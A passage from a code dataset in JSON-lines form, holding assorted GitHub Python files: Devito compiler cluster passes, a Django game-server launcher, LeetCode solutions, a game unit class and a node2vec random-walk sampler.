devito.symbolics import pow_to_mul\nfrom devito.tools import DAG, Stamp, as_tuple, flatten, frozendict, timed_pass\nfrom devito.types import Symbol\nfrom devito.types.grid import MultiSubDimension\n\n__all__ = ['Lift', 'fuse', 'optimize_pows', 'extract_increments',\n 'fission', 'optimize_msds']\n\n\nclass Lift(Queue):\n\n \"\"\"\n Remove invariant Dimensions from Clusters to avoid redundant computation.\n\n Notes\n -----\n This is analogous to the compiler transformation known as\n \"loop-invariant code motion\".\n \"\"\"\n\n @timed_pass(name='lift')\n def process(self, elements):\n return super(Lift, self).process(elements)\n\n def callback(self, clusters, prefix):\n if not prefix:\n # No iteration space to be lifted from\n return clusters\n\n hope_invariant = prefix[-1].dim._defines\n outer = set().union(*[i.dim._defines for i in prefix[:-1]])\n\n lifted = []\n processed = []\n for n, c in enumerate(clusters):\n # Increments prevent lifting\n if c.has_increments:\n processed.append(c)\n continue\n\n # Is `c` a real candidate -- is there at least one invariant Dimension?\n if any(d._defines & hope_invariant for d in c.used_dimensions):\n processed.append(c)\n continue\n\n impacted = set(processed) | set(clusters[n+1:])\n\n # None of the Functions appearing in a lifted Cluster can be written to\n if any(c.functions & set(i.scope.writes) for i in impacted):\n processed.append(c)\n continue\n\n # All of the inner Dimensions must appear in the write-to region\n # otherwise we would violate data dependencies. Consider\n #\n # 1) 2) 3)\n # for i for i for i\n # for x for x for x\n # r = f(a[x]) for y for y\n # r[x] = f(a[x, y]) r[x, y] = f(a[x, y])\n #\n # In 1) and 2) lifting is infeasible; in 3) the statement can be lifted\n # outside the `i` loop as `r`'s write-to region contains both `x` and `y`\n xed = {d._defines for d in c.used_dimensions if d not in outer}\n if not all(i & set(w.dimensions) for i, w in product(xed, c.scope.writes)):\n processed.append(c)\n continue\n\n # The contracted iteration and data spaces\n key = lambda d: d not in hope_invariant\n ispace = c.ispace.project(key).reset()\n\n # Some properties are dropped\n properties = {d: v for d, v in c.properties.items() if key(d)}\n properties = {d: v - {TILABLE} for d, v in properties.items()}\n\n lifted.append(c.rebuild(ispace=ispace, properties=properties))\n\n return lifted + processed\n\n\nclass Fusion(Queue):\n\n \"\"\"\n Fuse Clusters with compatible IterationSpace.\n \"\"\"\n\n def __init__(self, toposort, options=None):\n options = options or {}\n\n self.toposort = toposort\n self.fusetasks = options.get('fuse-tasks', False)\n\n super().__init__()\n\n def _make_key_hook(self, cgroup, level):\n assert level > 0\n assert len(cgroup.guards) == 1\n return (tuple(cgroup.guards[0].get(i.dim) for i in cgroup.itintervals[:level-1]),)\n\n def process(self, clusters):\n cgroups = [ClusterGroup(c, c.itintervals) for c in clusters]\n cgroups = self._process_fdta(cgroups, 1)\n clusters = ClusterGroup.concatenate(*cgroups)\n return clusters\n\n def callback(self, cgroups, prefix):\n # Toposort to maximize fusion\n if self.toposort:\n clusters = self._toposort(cgroups, prefix)\n else:\n clusters = ClusterGroup(cgroups)\n\n # Fusion\n processed = []\n for k, g in groupby(clusters, key=self._key):\n maybe_fusible = list(g)\n\n if len(maybe_fusible) == 1:\n processed.extend(maybe_fusible)\n else:\n try:\n # Perform fusion\n fused = Cluster.from_clusters(*maybe_fusible)\n processed.append(fused)\n except ValueError:\n # We end up here if, for example, some Clusters have same\n # iteration Dimensions but different (partial) orderings\n processed.extend(maybe_fusible)\n\n return [ClusterGroup(processed, prefix)]\n\n def _key(self, c):\n # Two Clusters/ClusterGroups are fusion candidates if their key is identical\n\n key = (frozenset(c.itintervals), c.guards)\n\n # We allow fusing Clusters/ClusterGroups even in presence of WaitLocks and\n # WithLocks, but not with any other SyncOps\n if isinstance(c, Cluster):\n sync_locks = (c.sync_locks,)\n else:\n sync_locks = c.sync_locks\n for i in sync_locks:\n mapper = defaultdict(set)\n for k, v in i.items():\n for s in v:\n if s.is_WaitLock or \\\n (self.fusetasks and s.is_WithLock):\n mapper[k].add(type(s))\n else:\n mapper[k].add(s)\n mapper[k] = frozenset(mapper[k])\n mapper = frozendict(mapper)\n key += (mapper,)\n\n return key\n\n def _toposort(self, cgroups, prefix):\n # Are there any ClusterGroups that could potentially be fused? If\n # not, do not waste time computing a new topological ordering\n counter = Counter(self._key(cg) for cg in cgroups)\n if not any(v > 1 for it, v in counter.most_common()):\n return ClusterGroup(cgroups)\n\n # Similarly, if all ClusterGroups have the same exact prefix and\n # use the same form of synchronization (if any at all), no need to\n # attempt a topological sorting\n if len(counter.most_common()) == 1:\n return ClusterGroup(cgroups)\n\n dag = self._build_dag(cgroups, prefix)\n\n def choose_element(queue, scheduled):\n # Heuristic: let `k0` be the key of the last scheduled node; then out of\n # the possible schedulable nodes we pick the one with key `k1` such that\n # `max_i : k0[:i] == k1[:i]` (i.e., the one with \"the most similar key\")\n if not scheduled:\n return queue.pop()\n key = self._key(scheduled[-1])\n for i in reversed(range(len(key) + 1)):\n candidates = [e for e in queue if self._key(e)[:i] == key[:i]]\n try:\n # Ensure stability\n e = min(candidates, key=lambda i: cgroups.index(i))\n except ValueError:\n continue\n queue.remove(e)\n return e\n assert False\n\n return ClusterGroup(dag.topological_sort(choose_element))\n\n def _build_dag(self, cgroups, prefix):\n \"\"\"\n A DAG representing the data dependences across the ClusterGroups within\n a given scope.\n \"\"\"\n prefix = {i.dim for i in as_tuple(prefix)}\n\n dag = DAG(nodes=cgroups)\n for n, cg0 in enumerate(cgroups):\n for cg1 in cgroups[n+1:]:\n # A Scope to compute all cross-ClusterGroup anti-dependences\n rule = lambda i: i.is_cross\n scope = Scope(exprs=cg0.exprs + cg1.exprs, rules=rule)\n\n # Optimization: we exploit the following property:\n # no prefix => (edge <=> at least one (any) dependence)\n # to jump out of this potentially expensive loop as quickly as possible\n if not prefix and any(scope.d_all_gen()):\n dag.add_edge(cg0, cg1)\n\n # Anti-dependences along `prefix` break the execution flow\n # (intuitively, \"the loop nests are to be kept separated\")\n # * All ClusterGroups between `cg0` and `cg1` must precede `cg1`\n # * All ClusterGroups after `cg1` cannot precede `cg1`\n elif any(i.cause & prefix for i in scope.d_anti_gen()):\n for cg2 in cgroups[n:cgroups.index(cg1)]:\n dag.add_edge(cg2, cg1)\n for cg2 in cgroups[cgroups.index(cg1)+1:]:\n dag.add_edge(cg1, cg2)\n break\n\n # Any anti- and iaw-dependences impose that `cg1` follows `cg0`\n # while not being its immediate successor (unless it already is),\n # to avoid they are fused together (thus breaking the dependence)\n # TODO: the \"not being its immediate successor\" part *seems* to be\n # a work around to the fact that any two Clusters characterized\n # by anti-dependence should have been given a different stamp,\n # and same for guarded Clusters, but that is not the case (yet)\n elif any(scope.d_anti_gen()) or\\\n any(i.is_iaw for i in scope.d_output_gen()):\n dag.add_edge(cg0, cg1)\n index = cgroups.index(cg1) - 1\n if index > n and self._key(cg0) == self._key(cg1):\n dag.add_edge(cg0, cgroups[index])\n dag.add_edge(cgroups[index], cg1)\n\n # Any flow-dependences along an inner Dimension (i.e., a Dimension\n # that doesn't appear in `prefix`) impose that `cg1` follows `cg0`\n elif any(not (i.cause and i.cause & prefix) for i in scope.d_flow_gen()):\n dag.add_edge(cg0, cg1)\n\n # Clearly, output dependences must be honored\n elif any(scope.d_output_gen()):\n dag.add_edge(cg0, cg1)\n\n return dag\n\n\n@timed_pass()\ndef fuse(clusters, toposort=False, options=None):\n \"\"\"\n Clusters fusion.\n\n If ``toposort=True``, then the Clusters are reordered to maximize the likelihood\n of fusion; the new ordering is computed such that all data dependencies are honored.\n \"\"\"\n return Fusion(toposort, options).process(clusters)\n\n\n@cluster_pass(mode='all')\ndef optimize_pows(cluster, *args):\n \"\"\"\n Convert integer powers into Muls, such as ``a**2 => a*a``.\n \"\"\"\n return cluster.rebuild(exprs=[pow_to_mul(e) for e in cluster.exprs])\n\n\n@cluster_pass(mode='sparse')\ndef extract_increments(cluster, sregistry, *args):\n \"\"\"\n Extract the RHSs of non-local tensor expressions performing an associative\n and commutative increment, and assign them to temporaries.\n \"\"\"\n processed = []\n for e in cluster.exprs:\n if e.is_Increment and e.lhs.function.is_Input:\n handle = Symbol(name=sregistry.make_name(), dtype=e.dtype).indexify()\n if e.rhs.is_Number or e.rhs.is_Symbol:\n extracted = e.rhs\n else:\n extracted = e.rhs.func(*[i for i in e.rhs.args if i != e.lhs])\n processed.extend([e.func(handle, extracted, is_Increment=False),\n e.func(e.lhs, handle)])\n else:\n processed.append(e)\n\n return cluster.rebuild(processed)\n\n\nclass Fission(Queue):\n\n \"\"\"\n Implement Clusters fission. For more info refer to fission.__doc__.\n \"\"\"\n\n def callback(self, clusters, prefix):\n if not prefix or len(clusters) == 1:\n return clusters\n\n d = prefix[-1].dim\n\n # Do not waste time if definitely illegal\n if any(SEQUENTIAL in c.properties[d] for c in clusters):\n return clusters\n\n # Do not waste time if definitely nothing to do\n if all(len(prefix) == len(c.itintervals) for c in clusters):\n return clusters\n\n # Analyze and abort if fissioning would break a dependence\n scope = Scope(flatten(c.exprs for c in clusters))\n if any(d._defines & dep.cause or dep.is_reduce(d) for dep in scope.d_all_gen()):\n return clusters\n\n processed = []\n for (it, guards), g in groupby(clusters, key=lambda c: self._key(c, prefix)):\n group = list(g)\n\n if any(SEQUENTIAL in c.properties[it.dim] for c in group) or guards:\n # Heuristic: no gain from fissioning if unable to ultimately\n # increase the number of collapsable iteration spaces, hence give up\n processed.extend(group)\n else:\n stamp = Stamp()\n for c in group:\n ispace = c.ispace.lift(d, stamp)\n processed.append(c.rebuild(ispace=ispace))\n\n return processed\n\n def _key(self, c, prefix):\n try:\n index = len(prefix)\n dims = tuple(i.dim for i in prefix)\n\n it = c.itintervals[index]\n guards = frozendict({d: v for d, v in c.guards.items() if d in dims})\n\n return (it, guards)\n except IndexError:\n return (None, c.guards)\n\n\n@timed_pass()\ndef fission(clusters):\n \"\"\"\n Clusters fission.\n\n Currently performed in the following cases:\n\n * Trade off data locality for parallelism, e.g.\n\n .. code-block::\n\n for x for x\n for y1 for y1\n .. ..\n for y2 --> for x\n .. for y2\n ..\n \"\"\"\n return Fission().process(clusters)\n\n\nclass MSDOptimizer(Queue):\n\n \"\"\"\n Implement MultiSubDomains optimization.\n\n Currently, the following optimizations are performed:\n\n * Removal of redundant thicknesses assignments. These stem from Eqs\n defined over the same MultiSubDomain in the very same loop nest.\n The redundant assignments obviously do not impact correctness,\n but they may affect other optimizations, such as fusion.\n \"\"\"\n\n def callback(self, clusters, prefix):\n if not prefix or any(isinstance(i.dim, MultiSubDimension) for i in prefix):\n return clusters\n\n msds = {d for d in set().union(*[c.dimensions for c in clusters])\n if isinstance(d, MultiSubDimension)}\n if not msds:\n return clusters\n\n # Remove redundant thicknesses assignments\n\n thicknesses = set().union(*[list(i._thickness_map) for i in msds])\n candidates = [c for c in clusters if set(c.scope.writes) & thicknesses]\n\n # First of all, make sure we analyze all and only the thicknesses assignments\n # at the same depth\n d = prefix[-1].dim\n if any(c.itintervals[-1].dim is not d for c in candidates):\n return clusters\n\n # Then, attempt extirpation of redundancies\n schedulable = set(thicknesses)\n processed = []\n for c in clusters:\n if c in candidates:\n exprs = []\n for e in c.exprs:\n try:\n schedulable.remove(e.lhs)\n exprs.append(e)\n except KeyError:\n # Already scheduled, no-op\n pass\n if exprs:\n processed.append(c.rebuild(exprs=exprs))\n else:\n processed.append(c)\n\n # Sanity check\n assert len(schedulable) == 0\n\n return processed\n\n\n@timed_pass()\ndef optimize_msds(clusters):\n \"\"\"\n Optimize clusters defined over MultiSubDomains.\n \"\"\"\n return MSDOptimizer().process(clusters)\n","repo_name":"felipeaugustogudes/paper-fwi","sub_path":"devito/devito/passes/clusters/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":16014,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"92"} +{"seq_id":"2496941255","text":"from collections import abc\nimport errno\nimport os\nimport random\nimport re\nimport socket\nimport socketserver\nimport sys\n\n\nimport django.core.management\nfrom django.core.management.commands import runserver\nfrom django.core.servers import basehttp\n\nRE_PORT = re.compile(r'\\d+$')\ndefault_port = 8778\n\nclass ManagementUtility(django.core.management.ManagementUtility):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.command_ = None\n\n def fetch_command(self, *args, **kwargs):\n self.command_ = super().fetch_command(*args, **kwargs)\n return self.command_\n\nutility = ManagementUtility(sys.argv)\n\nclass PortChanger(abc.Callable):\n def __init__(self, method, retries = 10, hop = 10):\n assert callable(method)\n self.method = method\n assert 0 < retries\n self.retries = retries\n assert 0 < hop <= default_port / retries\n self.hop = hop\n self.busy = set()\n self.port = None\n\n def _hop(self, port):\n self.busy.add(port)\n incr = random.randrange(-self.hop, self.hop)\n incr += (1 if 0 <= incr else 0)\n port += incr\n while port in self.busy:\n port -= int(incr / abs(incr))\n return port\n\n def __call__(self, addr, port, *args, **kwargs):\n stdout = utility.command_.stdout if utility.command_ else sys.stdout\n while True:\n try:\n return self.method(addr, port, *args, **kwargs)\n except socket.error as e:\n if e.errno == errno.EACCES:\n stdout.write(\"No access to port %d, retrying ...\" % port) \n elif e.errno == errno.EADDRINUSE:\n stdout.write(\"Port %d busy, retrying ...\" % port)\n else: \n raise\n if 0 >= self.retries:\n raise\n self.retries -= 1\n self.port = port = self._hop(port)\n stdout.write(\"Starting development server at http://%s:%s/\"\n % (addr, port))\n\nclass Prompter(abc.Callable):\n def __init__(self, obj, method):\n self.method = getattr(obj, method)\n self.restore = (obj, method)\n\n def __call__(self, *args, **kwargs):\n command = utility.command_\n if command:\n stdout = command.stdout\n protocol = command.protocol\n addr = '[%s]' % command.addr if command._raw_ipv6 else command.addr\n port = basehttp.run.port if isinstance(basehttp.run, PortChanger) else None\n port = port or command.port\n ports = { 'https': 443, 'http': 80 }\n suffix = '' if port == ports.get(protocol) else ':%s' % port\n if addr == ('[::]' if command.use_ipv6 else '0.0.0.0'):\n addr = '[::1]' if command.use_ipv6 else '127.0.0.1'\n stdout.write(\n '\\nTo start a game, point your browser at\\n %s://%s%s/\\n'\n 'To allow remote players to join, open port %s on your firewall,\\n'\n 'e.g. on Linux:\\n'\n ' sudo %s -A INPUT -p tcp -m tcp --dport %s -j ACCEPT\\n'\n '(the above command may need changes to work with existing\\n'\n ' iptables configuration or limit remote players\\' addresses)\\n\\n'\n % (protocol, addr, suffix, port,\n 'ip6tables' if command.use_ipv6 else 'iptables', port)\n )\n setattr(*self.restore, self.method)\n return self.method(*args, **kwargs)\n\ndef defaultServer(command):\n command = command.lower()\n if '.py' == command[-3:]:\n command = command[:-3]\n if 'runserver' != command:\n return\n sys.argv[0] = command\n os.environ[\"DJANGO_SETTINGS_MODULE\"] = \"cards_web.settings\"\n fixport = v6 = False\n addrport = None\n i = 1\n while i < len(sys.argv):\n arg = sys.argv[i]\n i += 1\n if arg.lower() == '--fixport':\n fixport = True\n i -= 1\n sys.argv.pop(i)\n elif arg == '--':\n if i < len(sys.argv):\n addrport = sys.argv[i]\n break\n elif not arg.startswith('-'):\n addrport = arg\n elif arg == '--ipv6' or arg == '-6':\n v6 = True \n sys.argv.insert(1, '--noreload')\n sys.argv.insert(0, realpath)\n if not fixport:\n import importlib\n basehttp.run = PortChanger(basehttp.run)\n importlib.reload(runserver)\n runserver.Command.default_port = default_port\n default_addr = '0.0.0.0'\n if hasattr(runserver.Command, 'default_addr'):\n setattr(runserver.Command, 'default_addr', default_addr)\n elif v6:\n pass\n elif not addrport:\n addrport = '%s:%s' % (default_addr, runserver.Command.default_port)\n sys.argv.append(addrport)\n elif RE_PORT.match(addrport):\n sys.argv.remove(addrport)\n addrport = default_addr + ':' + addrport\n sys.argv.append(addrport)\n default_addr = '::'\n if hasattr(runserver.Command, 'default_addr_ipv6'):\n setattr(runserver.Command, 'default_addr_ipv6', default_addr)\n elif not v6:\n pass\n elif not addrport:\n addrport = '%s:%s' % (default_addr, runserver.Command.default_port)\n sys.argv.append(addrport)\n elif RE_PORT.match(addrport):\n sys.argv.remove(addrport)\n addrport = default_addr + ':' + addrport\n sys.argv.append(addrport)\n prompter = Prompter(\n socketserver.BaseServer,\n 'serve_forever'\n )\n def patch(self, *args, **kwargs):\n prompter(self, *args, **kwargs)\n socketserver.BaseServer.serve_forever = patch\n\nif __name__ == \"__main__\":\n\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"cards_web.settings\")\n\n basedir, command = os.path.split(os.path.abspath(__file__))\n realpath = os.path.realpath(__file__)\n projdir = os.path.dirname(realpath)\n defaultServer(command)\n if not os.path.samefile(basedir, projdir):\n addpath = []\n for entry in os.listdir(basedir):\n if '.src' == entry[-4:].lower():\n entry = os.path.join(basedir, entry)\n if os.path.isdir(entry) and (\n not sys.path or\n not os.path.samefile(entry, os.path.abspath(sys.path[0]))\n ):\n sys.path.insert(0, entry)\n addpath.insert(0, entry)\n if addpath:\n if 'PYTHONPATH' in os.environ:\n addpath.append(os.environ['PYTHONPATH'])\n os.environ['PYTHONPATH'] = os.pathsep.join(addpath)\n\n genkey = True\n i = 1\n while i < len(sys.argv):\n arg = sys.argv[i]\n if arg.lower() == '--nokey':\n genkey = False\n sys.argv.pop(i)\n elif arg == '--':\n break\n i += 1\n\n if genkey and not 'DJANGO_SECRET_KEY' in os.environ:\n import string\n os.environ['DJANGO_SECRET_KEY'] = ''.join(\n [ random.SystemRandom().choice(\n \"{}{}{}\".format(string.ascii_letters, string.digits, string.punctuation))\n for i in range(63)\n ])\n\n utility.execute()\n","repo_name":"StanLivitski/cards.webapp","sub_path":"web.src/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":7227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"40263685835","text":"#Print addition of prime numbers between 50 to 100.\n\nbrr=[]\nsum=0\nfor i in range(50,101):\n brr.append(i)\n\nfor i in brr:\n if i > 1:\n for j in range(2, i):\n if (i % j) == 0:\n break\n else:\n sum=sum+i\n \n \nprint(\"Sum is \",sum)\n","repo_name":"Chandan4862/pythonBackup","sub_path":"trainingSession/workspace/test/q5.py","file_name":"q5.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"29508608530","text":"\"\"\"\nWrite a function to find the longest common prefix string amongst an array of strings.\n\nIf there is no common prefix, return an empty string \"\".\n\n\n\nExample 1:\n\nInput: strs = [\"flower\",\"flow\",\"flight\"]\nOutput: \"fl\"\nExample 2:\n\nInput: strs = [\"dog\",\"racecar\",\"car\"]\nOutput: \"\"\nExplanation: There is no common prefix among the input strings.\n\n\nConstraints:\n\n0 <= strs.length <= 200\n0 <= strs[i].length <= 200\nstrs[i] consists of only lower-case English letters.\n\"\"\"\n\n\nclass Solution(object):\n def longestCommonPrefix(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: str\n \"\"\"\n if len(strs) == 0:\n return \"\"\n lcp_string = \"\"\n strs_min = min(strs)\n strs_max = max(strs)\n for x in range(len(strs_min)):\n if strs_min[x] == strs_max[x]:\n lcp_string += strs_min[x]\n else:\n break\n return lcp_string\n\n\nmy_string = [\"dog\", \"racecar\", \"car\"]\nsolution = Solution()\nprint(solution.longestCommonPrefix(my_string))\n","repo_name":"skyheat47295/LeetCode_Problems_Python","sub_path":"Longest_Common_Prefix.py","file_name":"Longest_Common_Prefix.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"32629306948","text":"\"\"\"\n\" File Description:\n\" Given a binary search tree, write a function kthSmallest to find the kth smallest element in it.\n\"\n\" Created by Rocha(chenzhihao) on 2020/12/30.\n\" Mail: chenzh@wifi.com\n\"\"\"\n\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n\tdef __init__(self, val=0, left=None, right=None):\n\t\tself.val = val\n\t\tself.left = left\n\t\tself.right = right\n\n\nclass Solution(object):\n\tdef kthSmallest(self, root, k):\n\t\t\"\"\"\n\t\t:type root: TreeNode\n\t\t:type k: int\n\t\t:rtype: int\n\t\t\"\"\"\n\t\tst = []\n\t\tcur = root\n\n\t\twhile st or cur:\n\t\t\tif cur:\n\t\t\t\tst.append(cur)\n\t\t\t\tcur = cur.left\n\t\t\telse:\n\t\t\t\tcur = st.pop()\n\t\t\t\tk -= 1\n\n\t\t\t\tif k == 0:\n\t\t\t\t\treturn cur.val\n\n\t\t\t\tcur = cur.right\n\n\n\n\n\n\n\n\n","repo_name":"RochaC/leetcode_play","sub_path":"230_Kth_Smallest_Element_in_a_BST.py","file_name":"230_Kth_Smallest_Element_in_a_BST.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"31625735294","text":"import utils\r\n\r\nfrom units.unit import Unit\r\nfrom synergies import Sentinel\r\nfrom synergies import Cannoneer\r\nfrom projectile import Projectile\r\n\r\nclass LastEmbrace(Projectile):\r\n def on_unit_hit(self, time, unit):\r\n if unit.team == self.owner.team:\r\n return\r\n\r\n self.owner.deal_magic_damage(unit, self.owner.get_last_embrace_damage())\r\n unit.stun(time, self.owner.get_last_embrace_stun_duration())\r\n for u in self.map.units:\r\n if u.team != unit.team:\r\n continue\r\n if u.distance(unit.row, unit.col) <= 1:\r\n self.owner.deal_magic_damage(u, self.owner.get_last_embrace_damage())\r\n self.destroyed = True\r\n\r\n\r\nclass Senna(Unit):\r\n def __init__(self, **kwargs):\r\n super().__init__(\r\n cost=1,\r\n health=500,\r\n starting_mana=40,\r\n total_mana=80,\r\n armor=15,\r\n magic_resist=15,\r\n attack_damage=55,\r\n attack_speed=0.7,\r\n attack_range=4,\r\n image_name='senna',\r\n synergies=[Sentinel, Cannoneer],\r\n **kwargs,\r\n )\r\n self.cast_time = 0.2\r\n\r\n def get_last_embrace_damage(self):\r\n base_damage = {\r\n 1: 200,\r\n 2: 300,\r\n 3: 450\r\n }[max(1, self.star_level)]\r\n return base_damage * self.get_spell_power() / 100\r\n\r\n def get_last_embrace_stun_duration(self):\r\n return 1.5\r\n\r\n def perform_spell(self, map, time):\r\n target = self.farthest_hex_enemy(map)\r\n if not target:\r\n return\r\n\r\n x0, y0 = utils.xy_pos_from_ij_tile(self.row, self.col)\r\n xE, yE = utils.xy_pos_from_ij_tile(target.row, target.col)\r\n\r\n map.projectiles.append(\r\n LastEmbrace(\r\n map=map,\r\n owner=self,\r\n time=time,\r\n x0=x0,\r\n y0=y0,\r\n xE=xE,\r\n yE=yE,\r\n radius=20,\r\n hex_per_second=7,\r\n )\r\n )\r\n","repo_name":"aboubacs/tft-units","sub_path":"senna.py","file_name":"senna.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"29681317217","text":"from binarytree import build\n\n\ndef sample_tree_1():\n values = [7, 3, 2, 6, 9, None, 1, 5, 8]\n tree = build(values)\n return tree\n\n\ndef main():\n tree = sample_tree_1()\n print(tree)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"maddmaster/algos","sub_path":"python/breadth_first_search_old/btrees/base2.py","file_name":"base2.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"14364782615","text":"def check_Prime(data):\n for i in range(1,int(len(data)//2)+1):\n #extract subword from first letter , loop until half of word length \n key=words[0:i]\n #count exist times of key in word\n count=words.count(key)\n if len(key)*count == len(words):\n return 'not prime'\n break\n return 'prime'\nwords=input('string: ').strip()\nprint(check_Prime(words))","repo_name":"phat-code-hub/Public-Code","sub_path":"SoloLearn/Prime String.py","file_name":"Prime String.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"25282365506","text":"import itertools\nimport math\nimport random\nimport numpy as np\nimport pandas as pd\nfrom joblib import Parallel, delayed\nfrom tqdm import trange\nfrom alias import alias_sample, create_alias_table\nfrom utils import partition_num\n\nclass RandomWalker():\n def __init__(self,G,p,q):\n self.G = G\n self.p = p\n self.q = q\n\n def preprocessing_transition_probs(self):\n G = self.G\n alias_nodes = {}\n alias_edges = {}\n for node in G.nodes():\n unnormalized_probs = [G[node][nbs].get('weight',1.0) for nbs in G.neighbors(node)]\n norm_const = sum(unnormalized_probs)\n normalized_probs = [float(un_prob/norm_const) for un_prob in unnormalized_probs]\n alias_nodes[node] = create_alias_table(normalized_probs)\n\n for edge in G.edges():\n alias_edges[edge] = self.get_alias_edge(edge[0],edge[1])\n \n self.alias_nodes = alias_nodes\n self.alias_edges = alias_edges\n \n def get_alias_edge(self,pre_node,_node):\n G = self.G\n p = self.p \n q = self.q \n unnormalized_probs = []\n for nbs in G.neighbors(_node):\n weight = G[_node][nbs].get('weight', 1.0)\n if nbs == pre_node:\n unnormalized_probs.append(weight/p)\n elif G.has_edge(pre_node,nbs):\n unnormalized_probs.append(weight)\n else:unnormalized_probs.append(weight/q)\n norm_const = sum(unnormalized_probs)\n normalized_probs = [float(un_probs/norm_const) for un_probs in unnormalized_probs]\n\n return create_alias_table(normalized_probs)\n \n def node2vec_walk(self,walk_length,start_node):\n G = self.G \n alias_nodes = self.alias_nodes\n alias_edges = self.alias_edges\n walk = [start_node]\n while len(walk)<walk_length:\n cur = walk[-1]\n cur_nbrs = list(G.neighbors(cur))\n if len(cur_nbrs)>0:\n if len(walk)==1:\n walk.append(\n cur_nbrs[alias_sample(alias_nodes[cur][0], alias_nodes[cur][1])])\n else:\n prev = walk[-2]\n edge = (prev,cur)\n next_node = cur_nbrs[alias_sample(alias_edges[edge][0],alias_edges[edge][1])]\n walk.append(next_node)\n else: break\n \n return walk \n\n def _parallel_walk(self,nodes,num_walk,walk_length):\n G = self.G\n # nodes = G.nodes()\n walks = []\n for _ in range(num_walk):\n random.shuffle(nodes)\n for _n in nodes:\n walks.append(self.node2vec_walk(walk_length,_n))\n return walks\n\n def parallel_walks(self, num_walks, walk_length, workers=1, verbose=0):\n G = self.G\n nodes = list(G.nodes())\n results = Parallel(n_jobs=workers, verbose=verbose, )(\n delayed(self._parallel_walk)(nodes,num, walk_length) for num in\n partition_num(num_walks, workers))\n walks = list(itertools.chain(*results))\n return walks\n\n","repo_name":"gaudelbijay/node2vec","sub_path":"code/walker.py","file_name":"walker.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"31001617716","text":"\"\"\"\r\n백준 4485번 녹색 옷 입은 애가 젤다지?\r\n\r\n1. 아이디어\r\n- 다익스트라로 모든 점에 대하여 거리를 잰다\r\n\r\n2. 시간복잡도\r\n- VlogE = N*N log 4N*N = 125*125 log 4 * 125*125\r\n\r\n3. 자료구조\r\n- edges = int[N][N]\r\n- dist = int[N][N]\r\n- heap\r\n\r\n\r\n\"\"\"\r\nimport sys, heapq\r\nINF = sys.maxsize\r\ninput = sys.stdin.readline\r\n\r\n\r\n\r\n\r\ndef main(N):\r\n edges = [ list(map(int, input().split())) for _ in range(N) ]\r\n dist = [[INF] * N for _ in range(N)]\r\n dist[0][0] = edges[0][0]\r\n heap = [[dist[0][0], 0, 0]]\r\n\r\n dy = [1, 0, -1, 0]\r\n dx = [0, 1, 0, -1]\r\n while heap:\r\n w, y, x = heapq.heappop(heap)\r\n if w != dist[y][x]:\r\n continue\r\n\r\n for d in range(4):\r\n ey = y + dy[d]\r\n ex = x + dx[d]\r\n\r\n if 0<=ey<N and 0<=ex<N:\r\n if dist[ey][ex] > w + edges[ey][ex]:\r\n dist[ey][ex] = w + edges[ey][ex]\r\n heapq.heappush(heap, [dist[ey][ex], ey, ex])\r\n\r\n print(\"Problem {}: {}\".format(cnt, dist[N-1][N-1]))\r\n\r\ncnt = 1\r\nwhile True:\r\n N = int(input())\r\n if N == 0:\r\n break\r\n else:\r\n main(N)\r\n cnt += 1\r\n","repo_name":"compasstar/coding-test","sub_path":"Dijkstra's/baekjoon4485.py","file_name":"baekjoon4485.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"72078350700","text":"import abc\nimport contextlib\nimport os\nimport pathlib\nimport subprocess\n\n@contextlib.contextmanager\ndef cd(new_dir):\n cwd = os.getcwd()\n os.chdir(new_dir)\n yield\n os.chdir(cwd)\n\n\nclass AbstractWrapper(object):\n def __init__(self, name, config):\n self.name = name\n self.config = config\n self.results = []\n\n def get_results(self):\n return self.results\n\n @abc.abstractmethod\n def run_command(self, input_directory):\n pass\n\n def change_directory(self):\n return None\n\n def pre_analyze(self, inp):\n if not os.path.exists(os.path.join(self.config.results_dir, self.name)):\n os.makedirs(os.path.join(self.config.results_dir, self.name))\n\n def post_analyze(self, inp):\n pass\n\n def run(self, input_directory):\n new_dir = os.getcwd()\n if self.change_directory():\n new_dir = self.change_directory()\n inputs = [input_directory]\n if self.config.individual_files:\n inputs = pathlib.Path(input_directory).glob('*.%s' % self.config.file_ext)\n inputs = [str(i) for i in list(inputs)]\n with cd(new_dir):\n status = 0\n for inp in inputs:\n self.pre_analyze(inp)\n try:\n co = subprocess.run(self.run_command(str(inp)), check=True, shell=True)\n status = status | co.returncode\n self.post_analyze(inp)\n except Exception as ex:\n print(ex)\n print(\"Analysis failed!\")\n return status\n","repo_name":"gaborantal/compare-cg","sub_path":"wrappers/abstract_wrapper.py","file_name":"abstract_wrapper.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"75162370860","text":"\n# Import necessary modules\nfrom datetime import datetime, timedelta\nfrom helpers.db_helper import SessionLocal\nfrom 